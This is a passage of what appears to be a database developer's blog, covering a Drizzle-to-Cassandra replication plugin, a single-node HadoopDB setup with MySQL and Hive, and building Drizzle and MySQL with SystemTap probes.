However, the action performed for each type is virtually identical. First the header for that type is obtained. Next, the table metadata and actual data for the Statement are obtained. We then loop through each field affected by this Statement.
For example, with an INSERT Statement, we loop through each field affected by the INSERT and obtain the field metadata for that field. We use this to obtain the key that will be used for insertion in Cassandra. For this simple plugin, the key used by Cassandra is the primary key of a table. The name of the field is used as a column name in Cassandra and the value being inserted for that field is used as the value for that column. The name of the table on which the INSERT is happening corresponds to a column family name in Cassandra.
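The mapping described above can be sketched in a few lines of Python. This is only an illustration of the idea, not the plugin's C++ code: the dict layout standing in for a Statement message, the function name, and the tuple format of the result are all hypothetical. Skipping the primary key field and NULL values as columns, treating UPDATE like INSERT, and turning a DELETE into a row removal are assumptions on my part.

```python
def statement_to_mutations(statement):
    """Translate one row-change statement into Cassandra-style operations.

    `statement` is a plain dict standing in for a Statement message
    (hypothetical shape): type, table, primary_key, and a list of rows,
    where each row maps field names to values.
    """
    if statement["type"] not in ("INSERT", "UPDATE", "DELETE"):
        return []  # other statement types are ignored

    column_family = statement["table"]  # table name -> column family
    pk_field = statement["primary_key"]
    mutations = []
    for row in statement["rows"]:
        key = str(row[pk_field])  # primary key value -> row key
        if statement["type"] == "DELETE":
            mutations.append(("remove", column_family, key))
            continue
        for name, value in row.items():
            # Assumption: the key field and NULLs are not stored as columns.
            if name == pk_field or value is None:
                continue
            # Field name -> column name, field value -> column value.
            mutations.append(("insert", column_family, key, name, str(value)))
    return mutations


insert = {
    "type": "INSERT",
    "table": "padraig",
    "primary_key": "a",
    "rows": [{"a": 3, "b": "domhnall", "c": "tomas"}],
}
for mutation in statement_to_mutations(insert):
    print(mutation)
```

Each tuple corresponds to one column write (or one row removal) against the column family named after the table.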
The initialization function for this plugin is pretty straightforward. We allocate memory for a CassandraApplier object and add that object to the plugin registry.
All the above files I referenced are placed in a directory named cassandra_applier that I created in the plugin directory of the lp:~posulliv/drizzle/rep-cassandra branch on Launchpad. To download and compile the plugin, perform the following:

bzr branch lp:~posulliv/drizzle/rep-cassandra
cd rep-cassandra
export CXXFLAGS=-I/usr/local/include/thrift
./config/autorun.sh
./configure --with-cassandra-applier-plugin
make

If any of the third-party libraries required by the plugin are absent, you will see a message informing you of that during the configure stage.
In order to start a Drizzle server from the above branch with the appropriate plugins loaded, I perform the following:

mkdir run
cd run
../drizzled/drizzled --basedir=$PWD \
--datadir=$PWD \
--plugin_add=default_replicator,cassandra_applier \
>> $PWD/drizzle.err 2>&1

To make sure the correct replication stream is enabled within Drizzle, I can query the data dictionary table Jay created for this purpose:

drizzle> select * from data_dictionary.replication_streams;
+--------------------+-------------------+
| REPLICATOR         | APPLIER           |
+--------------------+-------------------+
| default_replicator | cassandra_applier | 
+--------------------+-------------------+
1 row in set (0 sec)

drizzle>

Next I'll start up my Cassandra cluster that the applier plugin will work with. For reference, I'm using Cassandra 0.7 and the Cassandra cluster I used for this article is configured as follows (the cassandra.yaml file):

Now, to see the plugin in action, consider the following table in Drizzle:

drizzle> create table padraig
    -> (
    ->   a int,
    ->   b varchar(128),
    ->   c varchar(128),
    ->   primary key(a)
    -> );
Query OK, 0 rows affected (0.07 sec)

drizzle>

And assume we perform the following INSERT statements on the table:

drizzle> insert into padraig (a, b) values (1, 'sarah');
Query OK, 1 row affected (0.16 sec)

drizzle> insert into padraig (a, c) values (2, 'nimbus');
Query OK, 1 row affected (0.15 sec)

drizzle> insert into padraig (a, b, c) values (3, 'domhnall', 'tomas');
Query OK, 1 row affected (0.15 sec)

drizzle>

Now, to see what was inserted in Cassandra, we will use the Cassandra CLI interface:

$ ./bin/cassandra-cli 
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
[default@unknown] connect localhost/9160
Connected to: "Drizzle Example Cluster" on localhost/9160
[default@unknown] use drizzle;
Authenticated to keyspace: drizzle
[default@drizzle] get padraig['1']
=> (column=61, value=sarah, timestamp=1275376031524000)
Returned 1 results.
[default@drizzle] get padraig['2'] 
=> (column=62, value=nimbus, timestamp=1275376057537000)
Returned 1 results.
[default@drizzle] get padraig['3']                  
=> (column=62, value=domhnall, timestamp=1275376211981000)
=> (column=61, value=tomas, timestamp=1275376067097000)
Returned 2 results.
[default@drizzle] quit
$

Conclusions

That's about it for this article on Drizzle replication. If interested in more, feel free to ping the Drizzle mailing list with questions or comments. Parts of replication are still under active development and I know Jay loves to get feedback from people on the replication API in Drizzle.

Up and Running with HadoopDB

2010-05-10T00:00:00-07:00

HadoopDB is an interesting project going on at Yale under Prof. Daniel Abadi's supervision that I've been meaning to play with for some time now. I initially read the paper describing HadoopDB last year and intended to document how to set up a HadoopDB system using MySQL but I got busy with school work and never got around to it. Since I have a little more free time now that I've finished my thesis, I figured it was about time I got down to playing around with HadoopDB and describing how to set up a HadoopDB system using MySQL as the single node database. With that, I'm going to describe how to get up and running with HadoopDB. If you have not read the paper before starting, I strongly encourage you to give it a read. It's very well written and not that difficult to get through.
In this guide, I'm installing on Ubuntu Server 10.04 64-bit. Thus, I will be using the Ubuntu package manager heavily. I have not tested on other platforms but a lot of what is described here should apply to other platforms such as CentOS.
This guide is only on how to set up a single node system. It would not be difficult to extend what is contained here for setting up a multi-node system which I may write about in the future.

Installing Hadoop

Before installing Hadoop, Java needs to be installed. As of 10.04, the Sun JDK packages have been dropped from the Multiverse section of the Ubuntu archive. You can still install the Sun JDK if you wish but for this article, I used OpenJDK without issues:

sudo apt-get install openjdk-6-jdk

Before getting into the installation of Hadoop, I encourage you to read Michael Noll's in-depth guide to installing Hadoop on Ubuntu. I borrow from his articles a lot here.
First, create a user account and group that Hadoop will run as:

sudo groupadd hadoop
sudo useradd -m -g hadoop -d /home/hadoop -s /bin/bash -c "Hadoop software owner" hadoop

Next, we download Hadoop and create directories for storing the software and data. For this article, Hadoop 0.20.2 was used:

cd /opt
sudo wget http://www.gtlib.gatech.edu/pub/apache/hadoop/core/hadoop-0.20.2/hadoop-0.20.2.tar.gz
sudo tar zxvf hadoop-0.20.2.tar.gz
sudo ln -s /opt/hadoop-0.20.2 /opt/hadoop
sudo chown -R hadoop:hadoop /opt/hadoop /opt/hadoop-0.20.2
sudo mkdir -p /opt/hadoop-data/tmp-base
sudo chown -R hadoop:hadoop /opt/hadoop-data/

Alternatively, Cloudera has created Deb packages that can be used if you wish. I have not used them before so can't comment on how they work.
Next, we need to configure SSH for the hadoop user. This is required by Hadoop in order to manage any nodes.

su - hadoop
ssh-keygen -t rsa
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys

When the ssh-keygen command is run, be sure to leave the passphrase as blank so that you will not be prompted for a password.
We will want to update the .bashrc file for the hadoop user with appropriate environment variables to make administration easier:
We will cover installing Hive later in this article but for now, leave that environment variable in there. For the remainder of this article, I will be referring to various locations such as the Hadoop installation directory using the environment variables defined above.
Next, we want to configure Hadoop. There are 3 configuration files in Hadoop that we need to modify:

$HADOOP_CONF/core-site.xml
$HADOOP_CONF/mapred-site.xml
$HADOOP_CONF/hdfs-site.xml

Based on the directory structure I created beforehand, these 3 files looked as follows for me:
Notice the reference to the HadoopDB XML file. We will cover that later but it is necessary for using HadoopDB to have that property in your configuration.
Next, we need to modify the $HADOOP_CONF/hadoop-env.sh file so that the JAVA_HOME variable is correctly set in that file. Thus, I have the following 2 lines in my hadoop-env.sh file:

# The java implementation to use.  Required.
export JAVA_HOME=/usr/lib/jvm/java-6-openjdk

Next, we need to format the Hadoop filesystem:

$ hadoop namenode -format
10/05/07 14:24:12 INFO namenode.NameNode: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting NameNode
STARTUP_MSG:   host = hadoop1/127.0.1.1
STARTUP_MSG:   args = [-format]
STARTUP_MSG:   version = 0.20.2
STARTUP_MSG:   build = https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r
911707; compiled by 'chrisdo' on Fri Feb 19 08:07:34 UTC 2010
************************************************************/
10/05/07 14:24:12 INFO namenode.FSNamesystem: fsOwner=hadoop,hadoop
10/05/07 14:24:12 INFO namenode.FSNamesystem: supergroup=supergroup
10/05/07 14:24:12 INFO namenode.FSNamesystem: isPermissionEnabled=true
10/05/07 14:24:12 INFO common.Storage: Image file of size 96 saved in 0 seconds.
10/05/07 14:24:12 INFO common.Storage: Storage directory /opt/hadoop-data/tmp-base/dfs/name has been
successfully formatted.
10/05/07 14:24:12 INFO namenode.NameNode: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down NameNode at hadoop1/127.0.1.1
************************************************************/
$

The above is the output from a successful format. Now, we can finally start our single-node Hadoop installation:

$ start-all.sh
starting namenode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-namenode-hadoop1.out
localhost: starting datanode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-datanode-hadoop1.out
localhost: starting secondarynamenode, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-hadoop1.out
starting jobtracker, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-jobtracker-hadoop1.out
localhost: starting tasktracker, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-tasktracker-hadoop1.out
$

Again, if you don't see output similar to the above, something went wrong. The log files under /opt/hadoop/logs are quite helpful for trouble-shooting.
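If you would rather check the start-up output mechanically, the following Python sketch looks for a "starting <daemon>" line for each of the five daemons shown above. The function name is made up for this example and the log paths in the sample are shortened placeholders; it only inspects the text printed by start-all.sh and says nothing about whether a daemon stayed up afterwards.

```python
EXPECTED_DAEMONS = (
    "namenode",
    "datanode",
    "secondarynamenode",
    "jobtracker",
    "tasktracker",
)


def missing_daemons(start_output):
    """Return the expected daemons that have no 'starting <name>' line."""
    started = set()
    for line in start_output.splitlines():
        words = line.split()
        if "starting" in words[:-1]:
            # The daemon name is the word right after "starting".
            name = words[words.index("starting") + 1].rstrip(",")
            started.add(name)
    return [name for name in EXPECTED_DAEMONS if name not in started]


# Shortened, made-up sample with two daemons deliberately left out.
sample = """starting namenode, logging to /opt/hadoop/logs/namenode.out
localhost: starting datanode, logging to /opt/hadoop/logs/datanode.out
starting jobtracker, logging to /opt/hadoop/logs/jobtracker.out"""
print(missing_daemons(sample))
```

An empty list means every daemon printed its start-up line; anything else tells you which log file to open first.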

Installing MySQL

Installing MySQL is quite simple on Ubuntu. I went with the MySQL Server package:

sudo apt-get install mysql-server

We don't need to perform any special configuration of MySQL for HadoopDB. Just make sure to take note of what password you specify for the root user since we will perform all work with HadoopDB as the root user (this is not mandatory but what I did to keep things simple).
Next, we need to install the MySQL JDBC driver. For this article, I used Connector J. After downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

cp mysql-connector-java-5.1.12-bin.jar $HADOOP_HOME/lib

It's worth noting that in the paper, the authors do say that initially they used MySQL with HadoopDB but switched to PostgreSQL. The main reason cited is the poor join algorithms in MySQL, which I assume refers to the fact that only nested loop join is supported in MySQL. I don't attempt to make any comparison of HadoopDB running with MySQL versus PostgreSQL but I wanted to point out the authors' observation.

Download HadoopDB

Now we can download HadoopDB. I'm going to download both the jar file and check out the source from Subversion. After downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

cp hadoopdb.jar $HADOOP_HOME/lib

I also checked out the source code from Subversion in case I needed to re-build the jar file at any time:

svn co https://hadoopdb.svn.sourceforge.net/svnroot/hadoopdb hadoopdb

Install Hive

Hive is used by HadoopDB as a SQL interface to their system. It's not a requirement for working with HadoopDB but it is another way to interact with HadoopDB so I'll cover how to install it.
First, we need to create directories in HDFS:

hadoop fs -mkdir /tmp
hadoop fs -mkdir /user/hive/warehouse
hadoop fs -chmod g+w /tmp
hadoop fs -chmod g+w /user/hive/warehouse

Next, we need to download the SMS_dist tar file from the HadoopDB download page:

tar zxvf SMS_dist.tar.gz
sudo mv dist /opt/hive
sudo chown -R hadoop:hadoop /opt/hive

Since we already set up the environment variables related to Hive earlier when we were installing Hadoop, everything we need should now be in our path:

$ hive
Hive history file=/tmp/hadoop/hive_job_log_hadoop_201005081717_1990651345.txt
hive> 

create     describe   exit       from       load       quit       set
hive> quit;
$

Data

We want some data to play around with for testing purposes. For this article, I'm going to use the data from the paper published last summer: 'A Comparison of Approaches to Large-Scale Data Analysis'. Documentation on how to reproduce the benchmarks in that paper is provided in the link I gave to the paper. For this article, since I'm only running one Hadoop node and have absolutely no interest in generating lots of data, I modified the scripts provided to produce tiny amounts of data:

svn co http://graffiti.cs.brown.edu/svn/benchmarks/
cd benchmarks/datagen/teragen

Within the benchmarks/datagen/teragen folder, there is a Perl script named teragen.pl that is responsible for the generation of data. I modified that script for my purposes to look like:
We then run the above Perl script to generate data that will be loaded into HDFS.
HadoopDB comes with a data partitioner that can partition data into a specified number of partitions. This is not particularly important for this article since we are running a single-node cluster so we only have 1 partition. The idea is that a separate partition can be bulk-loaded into a separate database node and indexed appropriately. For us, we just need to create a database and table in our MySQL database. Since we only have 1 partition, the database name will reflect that. The procedure to load the data set we generated into our single MySQL node is:

hadoop fs -get /data/SortGrep535MB/part-00000 my_file
mysql -u root -ppassword
mysql> create database grep0;
mysql> use grep0;
mysql> create table grep (
    ->   key1 char(10),
    ->   field char(90)
    -> );
mysql> load data local infile 'my_file' into table grep fields terminated by '|' (key1, field);

We now have data loaded into both HDFS and MySQL. The data we are working with is from the grep benchmark which is not the best benchmark for HadoopDB since it is unstructured data. However, since this article is just about how to set up HadoopDB and not testing its performance, I didn't really worry about that much.
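To illustrate the partitioning idea mentioned earlier in this section (one partition per database node, with the partition number reflected in the database name), here is a small Python sketch. It is not HadoopDB's partitioner, which runs as a Hadoop job; the function name, the choice of crc32 as the hash, and the sample rows are all assumptions made for the example. Only the grep0 naming comes from the setup above.

```python
import zlib


def partition_rows(rows, num_partitions, db_prefix="grep"):
    """Group (key, value) rows into per-database buckets by hashing the key."""
    buckets = {f"{db_prefix}{i}": [] for i in range(num_partitions)}
    for key, value in rows:
        # crc32 is used because it is stable across runs (unlike hash()).
        index = zlib.crc32(key.encode("utf-8")) % num_partitions
        buckets[f"{db_prefix}{index}"].append((key, value))
    return buckets


# Made-up rows; with a single partition everything lands in grep0.
rows = [("key-one", "aaa"), ("key-two", "bbb"), ("key-three", "ccc")]
single = partition_rows(rows, 1)
print(list(single))
```

With more than one partition, each bucket would be bulk-loaded into the database of the same name on its own node.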

HadoopDB Catalog and Running a Job

The HadoopDB catalog is stored as an XML file in HDFS. A tool is provided that generates this XML file from a properties file. For this article, the properties file I used is:
The machines.txt file must exist and for this article, my machines.txt file had only 1 entry: localhost
Then in order to generate the XML file and store it in HDFS, the following is performed:

java -cp $HADOOP_HOME/lib/hadoopdb.jar edu.yale.cs.hadoopdb.catalog.SimpleCatalogGenerator \
    Catalog.properties
hadoop dfs -put HadoopDB.xml HadoopDB.xml

Please note that the above tool is quite fragile and expects the input properties file to be in a certain format with certain fields. It's pretty easy to break the tool, which is understandable given this is a research project.
We are now ready to run a HadoopDB job! The HadoopDB distribution comes with a bunch of benchmarks that were used in the paper that was published on HadoopDB. The data I generated in this article corresponds to the data that was used for their benchmarks so I can use jobs that have already been written in order to test my setup.
I'm using the grep task from the paper to search for a pattern in the data I loaded earlier. Thus, to kick off a job I do:

java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
    -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml

Running the job, I see output like the following:

java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
> -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
10/05/08 18:01:41 INFO exec.DBJobBase: grep_db_job
10/05/08 18:01:41 INFO exec.DBJobBase: SELECT key1, field FROM grep WHERE field LIKE '%%wo%%';
10/05/08 18:01:41 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker,
sessionId=
10/05/08 18:01:41 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments.
Applications should implement Tool for the same.
10/05/08 18:01:41 INFO mapred.JobClient: Running job: job_local_0001
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Data locality failed for
hadoop1.localdomain
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Task from hadoop1.localdomain is connecting
to chunk 0 on host localhost with db url jdbc:mysql://localhost:3306/grep0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: SELECT key1, field FROM grep WHERE field
LIKE '%%wo%%';
10/05/08 18:01:41 INFO mapred.MapTask: numReduceTasks: 0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: DB times (ms): connection = 245, query
execution = 2, row retrieval  = 36
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Rows retrieved = 3
10/05/08 18:01:41 INFO mapred.TaskRunner: Task:attempt_local_0001_m_000000_0 is done. And is in the
process of commiting
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task attempt_local_0001_m_000000_0 is allowed to commit
now
10/05/08 18:01:41 INFO mapred.FileOutputCommitter: Saved output of task
'attempt_local_0001_m_000000_0' to file:/home/hadoop/padraig
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task 'attempt_local_0001_m_000000_0' done.
10/05/08 18:01:42 INFO mapred.JobClient:  map 100% reduce 0%
10/05/08 18:01:42 INFO mapred.JobClient: Job complete: job_local_0001
10/05/08 18:01:42 INFO mapred.JobClient: Counters: 6
10/05/08 18:01:42 INFO mapred.JobClient:   FileSystemCounters
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_READ=115486
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_WRITTEN=130574
10/05/08 18:01:42 INFO mapred.JobClient:   Map-Reduce Framework
10/05/08 18:01:42 INFO mapred.JobClient:     Map input records=3
10/05/08 18:01:42 INFO mapred.JobClient:     Spilled Records=0
10/05/08 18:01:42 INFO mapred.JobClient:     Map input bytes=3
10/05/08 18:01:42 INFO mapred.JobClient:     Map output records=3
10/05/08 18:01:42 INFO exec.DBJobBase: 
grep_db_job JOB TIME : 1747 ms.

$

The results are stored in HDFS and I also specified I wanted the results put in an output directory named padraig. Inspecting the results I see:

$ cd padraig
$ cat part-00000
~k~MuMq=	w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5<
vkrvkB8	6i0000000000.h9RSz'>Kfp6l~kE0FV"aP!>xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA
]&{`H%]1{E0000000000Z[@egp'h9!	BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`>q*{6=7
$

I can verify this result by going to the data stored in MySQL and performing the same query on it:

mysql> select key1, field from grep where field like '%wo%';
+--------------------------------+------------------------------------------------------------------------------------------+
| key1                           | field                                                                                    |
+--------------------------------+------------------------------------------------------------------------------------------+
| ~k~MuMq=                       | w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5<                             |
| vkrvkB8                        | 6i0000000000.h9RSz'>Kfp6l~kE0FV"aP!>xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA |
| ]&{`H%]1{E0000000000Z[@egp'h9! | BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`>q*{6=7                            |
+--------------------------------+------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql>

Thus, I can see the same rows were returned by the HadoopDB job.
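The same comparison can be scripted. The Python sketch below parses tab-separated job output into (key1, field) pairs and checks it against rows filtered with a stand-in for LIKE '%wo%'. The helper names and the sample rows are made up for illustration. The match is case-insensitive on the assumption that the table uses one of MySQL's default case-insensitive collations, which appears to be why the second row above, containing only an upper-case WO, is returned.

```python
def parse_job_output(text):
    """Split each tab-separated output line into a (key1, field) tuple."""
    rows = []
    for line in text.splitlines():
        if line:
            key, _, value = line.partition("\t")
            rows.append((key, value))
    return rows


def like_contains(value, needle):
    """Mimic `value LIKE '%needle%'` under a case-insensitive collation."""
    return needle.lower() in value.lower()


# Made-up rows for illustration only; they are not the benchmark data.
job_output = "k1\tabcwoxyz\nk2\tTWO-things\n"
db_rows = [("k2", "TWO-things"), ("k1", "abcwoxyz"), ("k3", "no match")]

job_rows = parse_job_output(job_output)
expected = [row for row in db_rows if like_contains(row[1], "wo")]
# Sorting both sides makes the comparison independent of row order.
print(sorted(job_rows) == sorted(expected))
```

Comparing sorted lists rather than raw output avoids false alarms when the job and the database return the same rows in a different order.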

Conclusion

I didn't get to use the Hive interface to HadoopDB as I had issues getting it going. If I get it going in the future, I'll likely write about it. HadoopDB is a pretty interesting project and I enjoyed reading the paper on it a lot. A demo of HadoopDB will be given at SIGMOD this year which should be interesting.
Overall, I think it's a pretty interesting project but I'm not sure how active it is. Based on the fact that a demo is being given at SIGMOD, I'm sure there is research being done on it but compared to other open source projects it's difficult to tell how much development is occurring. I'm sure this has more to do with the fact that it is a research project first and foremost whose source code just happens to be available. It would be nice to see a mailing list or something pop up around this project though. For example, if I wanted to contribute a patch, it's not really clear how I should go about doing that and whether it will be integrated or not.
I do think it's some interesting research though and I'll be keeping my eye on it and trying to mess around with it whenever I have spare time. Next thing I want to look into regarding HadoopDB is hooking it up to the column-oriented database MonetDB which I will write about if I get the chance.

Configuring Drizzle/MySQL for use with SystemTap

2010-04-02T00:00:00-07:00

In a previous post, I went through the steps involved to install SystemTap on a Linux box. Now, I'd like to show how to configure drizzle and MySQL for use with SystemTap.
First of all, you need to make sure the dtrace python script that is used by SystemTap is in your path. If it is not and you are on Ubuntu, you need to install the systemtap-sdt-dev package as mentioned in my last post. Assuming our system is set up correctly, we can build drizzle as follows:

$ bzr branch lp:drizzle stap
$ cd stap
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make

The drizzle binary will now have support for static stap probes. In order to verify this and see what probes are present in drizzle, let's start a drizzle server and list the probes in the server process:

$ cd tests
$ ./dtr --start-and-exit
$ sudo stap -l 'process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("*")'
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__start")
$

The argument to your process function should be the path to your drizzle binary. The process for MySQL is very similar. I'm going to just list the build commands and show the probes that are present in MySQL:

$ bzr branch lp:mysql-server mysql-stap
$ cd mysql-stap
$ ./BUILD/autogen.sh
$ ./configure --enable-dtrace
$ make
$ cd mysql-test
$ ./mtr --start &
$ sudo stap -l 'process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("*")'
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__block")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__done")
